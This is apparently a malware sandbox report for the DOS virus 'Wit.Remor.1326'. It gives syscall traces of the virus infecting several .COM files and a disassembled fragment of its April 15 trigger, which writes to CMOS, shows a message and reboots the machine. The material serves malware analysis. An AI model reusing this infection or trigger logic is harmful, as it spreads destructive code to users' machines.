Sample viewer

vx.netlux.org/Virus.DOS.Wit.Remor.1326

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:03:32.580677967Z 26 PC: 12ada | Set disk transfer address
2018-12-17T23:03:32.583183786Z 71 PC: 12aec | Get current directory
2018-12-17T23:03:32.586399312Z 42 PC: 12af2 | Get date 0x12af2: cmp dh, 4
0x12af5: jne 0x12b10
0x12af7: cmp dl, 0xf
0x12afa: jne 0x12b10
0x12afc: mov ax, 0x1010
0x12aff: out 0x70, ax
0x12b01: mov dx, 0x50b
0x12b04: mov ah, 9
0x12b06: int 0x21
0x12b08: mov ah, 8
0x12b0a: int 0x21
0x12b0c: mov al, 0xfe
0x12b0e: out 0x64, al
0x12b10: mov dx, 0x4f9
0x12b13: mov ah, byte ptr [0x5f0]
0x12b17: mov cl, 7
0x12b19: int 0x21
0x12b1b: jae 0x12b20
0x12b1d: jmp 0x12d95
0x12b20: mov dx, word ptr [0x52e]
2018-12-17T23:03:32.588870968Z 78 PC: 12b1b | Find first file
2018-12-17T23:03:32.596152782Z 67 PC: 12b37 | Get or set file attributes
2018-12-17T23:03:32.612151267Z 61 PC: 12b59 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:03:32.618523382Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-17T23:03:32.62502768Z 66 PC: 12ba1 | Move file pointer
2018-12-17T23:03:32.627425568Z 66 PC: 12bc3 | Move file pointer
2018-12-17T23:03:32.628956065Z 64 PC: 12bde | Write file or device (Write 407 bytes on handle 5)
2018-12-17T23:03:32.637741479Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:32.644732061Z 66 PC: 12c35 | Move file pointer
2018-12-17T23:03:32.646399431Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-17T23:03:32.6561584Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:03:32.659338314Z 67 PC: 12c6a | Get or set file attributes
2018-12-17T23:03:32.672274305Z 62 PC: 12c70 | Close file
2018-12-17T23:03:32.680258385Z 79 PC: 12b1b | Find next file
2018-12-17T23:03:32.683365543Z 67 PC: 12b37 | Get or set file attributes
2018-12-17T23:03:32.695678769Z 61 PC: 12b59 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:03:32.703026266Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-17T23:03:32.710069513Z 66 PC: 12ba1 | Move file pointer
2018-12-17T23:03:32.712766168Z 66 PC: 12bc3 | Move file pointer
2018-12-17T23:03:32.714868158Z 64 PC: 12bde | Write file or device (Write 27 bytes on handle 5)
2018-12-17T23:03:32.720200385Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:32.725044196Z 66 PC: 12c35 | Move file pointer
2018-12-17T23:03:32.726796065Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-17T23:03:32.736151322Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:03:32.742385159Z 67 PC: 12c6a | Get or set file attributes
2018-12-17T23:03:32.755021847Z 62 PC: 12c70 | Close file
2018-12-17T23:03:32.762972634Z 79 PC: 12b1b | Find next file
2018-12-17T23:03:32.767208072Z 67 PC: 12b37 | Get or set file attributes
2018-12-17T23:03:32.778632507Z 61 PC: 12b59 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:03:32.786507039Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-17T23:03:32.794027867Z 66 PC: 12ba1 | Move file pointer
2018-12-17T23:03:32.804475927Z 66 PC: 12bc3 | Move file pointer
2018-12-17T23:03:32.811411558Z 64 PC: 12bde | Write file or device (Write 92 bytes on handle 5)
2018-12-17T23:03:32.815676508Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:32.81980555Z 66 PC: 12c35 | Move file pointer
2018-12-17T23:03:32.821834914Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-17T23:03:32.830412237Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:03:32.832305233Z 67 PC: 12c6a | Get or set file attributes
2018-12-17T23:03:32.844073242Z 62 PC: 12c70 | Close file
2018-12-17T23:03:32.851733059Z 79 PC: 12b1b | Find next file
2018-12-17T23:03:32.855933605Z 67 PC: 12b37 | Get or set file attributes
2018-12-17T23:03:32.867175904Z 61 PC: 12b59 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:03:32.875639632Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-17T23:03:32.881560194Z 66 PC: 12ba1 | Move file pointer
2018-12-17T23:03:32.882868656Z 66 PC: 12bc3 | Move file pointer
2018-12-17T23:03:32.884188567Z 64 PC: 12bde | Write file or device (Write 29 bytes on handle 5)
2018-12-17T23:03:32.887421591Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:32.8898134Z 66 PC: 12c35 | Move file pointer
2018-12-17T23:03:32.891161893Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-17T23:03:32.897290743Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:03:32.899456303Z 67 PC: 12c6a | Get or set file attributes
2018-12-17T23:03:32.911336638Z 62 PC: 12c70 | Close file
2018-12-17T23:03:32.918981305Z 79 PC: 12b1b | Find next file
2018-12-17T23:03:32.922266799Z 67 PC: 12b37 | Get or set file attributes
2018-12-17T23:03:32.932991223Z 61 PC: 12b59 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:03:32.940992229Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-17T23:03:32.948425511Z 66 PC: 12ba1 | Move file pointer
2018-12-17T23:03:32.950021946Z 66 PC: 12bc3 | Move file pointer
2018-12-17T23:03:32.95144113Z 64 PC: 12bde | Write file or device (Write 29 bytes on handle 5)
2018-12-17T23:03:32.956907574Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:32.960348489Z 66 PC: 12c35 | Move file pointer
2018-12-17T23:03:32.962172267Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-17T23:03:32.972232348Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:03:32.974701262Z 67 PC: 12c6a | Get or set file attributes
2018-12-17T23:03:32.986773602Z 62 PC: 12c70 | Close file
2018-12-17T23:03:32.995284999Z 78 PC: 12b1b | Find first file
2018-12-17T23:03:33.001775161Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.009233684Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.01583442Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.022751706Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.029293197Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.036409246Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.043491182Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.049989538Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.056374606Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.063419088Z 59 PC: 12dba | Change current directory
2018-12-17T23:03:33.068561119Z 26 PC: 12dd7 | Set disk transfer address
2018-12-17T23:03:33.069550839Z 59 PC: 12de2 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14584,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:00.907671833Z 26 PC: 12ada | Set disk transfer address
2018-12-25T12:41:00.911518409Z 71 PC: 12aec | Get current directory
2018-12-25T12:41:00.915694207Z 42 PC: 12af2 | Get date 0x12af2: cmp dh, 4
0x12af5: jne 0x12b10
0x12af7: cmp dl, 0xf
0x12afa: jne 0x12b10
0x12afc: mov ax, 0x1010
0x12aff: out 0x70, ax
0x12b01: mov dx, 0x50b
0x12b04: mov ah, 9
0x12b06: int 0x21
0x12b08: mov ah, 8
0x12b0a: int 0x21
0x12b0c: mov al, 0xfe
0x12b0e: out 0x64, al
0x12b10: mov dx, 0x4f9
0x12b13: mov ah, byte ptr [0x5f0]
0x12b17: mov cl, 7
0x12b19: int 0x21
0x12b1b: jae 0x12b20
0x12b1d: jmp 0x12d95
0x12b20: mov dx, word ptr [0x52e]
2018-12-25T12:41:00.917758531Z 78 PC: 12b1b | Find first file
2018-12-25T12:41:00.923983158Z 67 PC: 12b37 | Get or set file attributes
2018-12-25T12:41:00.941115861Z 61 PC: 12b59 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:00.947995231Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-25T12:41:00.954601938Z 66 PC: 12ba1 | Move file pointer
2018-12-25T12:41:00.957414047Z 66 PC: 12bc3 | Move file pointer
2018-12-25T12:41:00.959170795Z 64 PC: 12bde | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:41:00.967560746Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:41:00.971299481Z 66 PC: 12c35 | Move file pointer
2018-12-25T12:41:00.97551687Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-25T12:41:00.984613603Z 87 PC: 12c58 | Get or set file date and time
2018-12-25T12:41:00.987004953Z 67 PC: 12c6a | Get or set file attributes
2018-12-25T12:41:00.998180476Z 62 PC: 12c70 | Close file
2018-12-25T12:41:01.005270401Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.009517293Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.019274251Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.025940929Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.032714706Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.035643397Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.036986227Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.040706921Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.044786609Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.046198535Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.053824913Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.056774701Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.067681592Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.074698113Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.078509127Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.088603406Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.095167307Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.102171706Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.103720852Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.105089551Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.109479963Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.112195366Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.113488926Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.121312987Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.122750416Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.133558075Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.141147574Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.144099724Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.15045884Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.154829539Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.159432702Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.16050762Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.161509171Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.165378567Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.168289673Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.169474992Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.176834606Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.178164898Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.188251281Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.19562383Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.198352419Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.207729541Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.215224129Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.221181316Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.222439411Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.224747121Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.228296456Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.230861113Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.232575151Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.240028457Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.241463666Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.252204264Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.259262754Z 78 PC: 12b1b | Find first file (See above)
2018-12-25T12:41:01.264978008Z 78 PC: 12cd6 | Find first file
2018-12-25T12:41:01.270778701Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.27644823Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.282042783Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.29228197Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.302660687Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.313021157Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.319133612Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.324898846Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.330423118Z 59 PC: 12dba | Change current directory
2018-12-25T12:41:01.334527477Z 26 PC: 12dd7 | Set disk transfer address
2018-12-25T12:41:01.33628303Z 59 PC: 12de2 | Change current directory

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14584,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:01.142994371Z 26 PC: 12ada | Set disk transfer address
2018-12-25T12:41:01.147678821Z 71 PC: 12aec | Get current directory
2018-12-25T12:41:01.150719009Z 42 PC: 12af2 | Get date 0x12af2: cmp dh, 4
0x12af5: jne 0x12b10
0x12af7: cmp dl, 0xf
0x12afa: jne 0x12b10
0x12afc: mov ax, 0x1010
0x12aff: out 0x70, ax
0x12b01: mov dx, 0x50b
0x12b04: mov ah, 9
0x12b06: int 0x21
0x12b08: mov ah, 8
0x12b0a: int 0x21
0x12b0c: mov al, 0xfe
0x12b0e: out 0x64, al
0x12b10: mov dx, 0x4f9
0x12b13: mov ah, byte ptr [0x5f0]
0x12b17: mov cl, 7
0x12b19: int 0x21
0x12b1b: jae 0x12b20
0x12b1d: jmp 0x12d95
0x12b20: mov dx, word ptr [0x52e]
2018-12-25T12:41:01.15301545Z 78 PC: 12b1b | Find first file
2018-12-25T12:41:01.159904345Z 67 PC: 12b37 | Get or set file attributes
2018-12-25T12:41:01.179955115Z 61 PC: 12b59 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:01.187512902Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-25T12:41:01.195009774Z 66 PC: 12ba1 | Move file pointer
2018-12-25T12:41:01.197452309Z 66 PC: 12bc3 | Move file pointer
2018-12-25T12:41:01.199243362Z 64 PC: 12bde | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:41:01.208059127Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:41:01.211806148Z 66 PC: 12c35 | Move file pointer
2018-12-25T12:41:01.213402722Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-25T12:41:01.223350881Z 87 PC: 12c58 | Get or set file date and time
2018-12-25T12:41:01.225870765Z 67 PC: 12c6a | Get or set file attributes
2018-12-25T12:41:01.237681071Z 62 PC: 12c70 | Close file
2018-12-25T12:41:01.245977212Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.249418636Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.260541028Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.268247966Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.276031932Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.278606212Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.281316795Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.285937266Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.290006036Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.291963389Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.300781986Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.303106476Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.314886813Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.322642906Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.327234689Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.338514565Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.347852726Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.355808781Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.357510534Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.359053157Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.363955115Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.367125803Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.368940264Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.377765441Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.380202447Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.39243704Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.400281485Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.403958454Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.416593208Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.424089265Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.43209011Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.433529243Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.435068477Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.440082314Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.443186138Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.444654357Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.453820549Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.45543652Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.466922924Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.474964126Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.479922554Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.490329966Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.497409456Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.504595062Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.505958799Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.507317323Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.511981533Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.513913141Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.514913316Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.520727852Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.522306937Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.534065554Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.542594584Z 78 PC: 12b1b | Find first file (See above)
2018-12-25T12:41:01.549029782Z 78 PC: 12cd6 | Find first file
2018-12-25T12:41:01.555472828Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.562876034Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.569326177Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.581265724Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.593382946Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.605702498Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.611921102Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.61812632Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.624786075Z 59 PC: 12dba | Change current directory
2018-12-25T12:41:01.629628249Z 26 PC: 12dd7 | Set disk transfer address
2018-12-25T12:41:01.630736937Z 59 PC: 12de2 | Change current directory

{"DateBased":true,"Day":15,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14584,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:01.664769282Z 26 PC: 12ada | Set disk transfer address
2018-12-25T12:41:01.667779506Z 71 PC: 12aec | Get current directory
2018-12-25T12:41:01.671040714Z 42 PC: 12af2 | Get date 0x12af2: cmp dh, 4
0x12af5: jne 0x12b10
0x12af7: cmp dl, 0xf
0x12afa: jne 0x12b10
0x12afc: mov ax, 0x1010
0x12aff: out 0x70, ax
0x12b01: mov dx, 0x50b
0x12b04: mov ah, 9
0x12b06: int 0x21
0x12b08: mov ah, 8
0x12b0a: int 0x21
0x12b0c: mov al, 0xfe
0x12b0e: out 0x64, al
0x12b10: mov dx, 0x4f9
0x12b13: mov ah, byte ptr [0x5f0]
0x12b17: mov cl, 7
0x12b19: int 0x21
0x12b1b: jae 0x12b20
0x12b1d: jmp 0x12d95
0x12b20: mov dx, word ptr [0x52e]
2018-12-25T12:41:01.674042037Z 9 PC: 12b08 | Display string (String= '��ࠡ���� - rulez forever ! ')
2018-12-25T12:41:01.678736801Z 8 PC: 12b0c | Console input without echo